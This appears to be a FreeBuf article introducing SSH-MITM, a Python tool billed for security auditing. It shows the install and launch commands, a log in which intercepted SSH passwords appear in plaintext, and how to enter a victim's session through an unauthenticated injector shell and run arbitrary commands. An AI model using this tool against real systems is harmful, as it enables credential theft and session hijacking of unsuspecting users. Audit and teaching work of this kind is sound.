freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

SSH-MITM:支持公钥认证&会话劫持和文件篡改的安全审计MITM服务器
2021-01-25 13:52:32

SSH-MITM-拦截SSH流量

SSH-MITM服务器专为安全审计而设计,支持公钥认证、会话劫持和文件篡改等功能。需要注意的是,该工具基于Python语言开发,因此需要在主机设备上安装并配置好Python环境。

SSH-MITM安装

在使用任何软件包之前,我们都需要进行正确的安装。如需安装SSH-MITM,我们只需要在设备上打开命令行终端,然后运行下列命令即可:

$ pip install ssh-mitm

工具使用

SSH-MITM的使用非常简单,如果需要密码认证或会话劫持,只需要开启拦截MITM-SSH服务器即可。打开命令行终端,然后运行下列命令:

$ ssh-mitm --remote-host 192.168.0.x

接下来,我们尝试跟SSH-MITM服务器建立连接。SSH-MITM服务器会监听10022端口:

$ ssh -p 10022 user@proxyserver

此时,我们将会看到凭证信息在日志中输出:

2021-01-01 11:38:26,098 [INFO]  Client connection established with parameters:

    Remote Address: 192.168.0.x

    Port: 22

    Username: user

    Password: supersecret

    Key: None

Agent: None

会话劫持

获取明文凭证信息仅仅只是SSH-MITM的其中一个功能而已,当客户端成功连接之后,SSH-MITM会开启一个新的服务器,并用于会话劫持:

2021-01-01 11:42:43,699 [INFO]  created injector shell on port 34463. connect with: ssh -p 34463 127.0.0.1

在劫持会话的时候,我们可以选择自己喜欢的SSH客户端。需要注意的是,这个连接不需要任何身份验证:

$ ssh -p 34463 127.0.0.1

建立连接之后,你的会话只会通过最新的响应信息来更新,但是我们仍然可以执行任意命令。

接下来,我们就可以在劫持的会话或原始会话中尝试执行某些命令了。

命令的执行结果将输出显示在两个会话中。

项目地址

SSH-MITM:【GitHub传送门

# 会话劫持 # 凭证盗取 # MITM攻击
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者
文章目录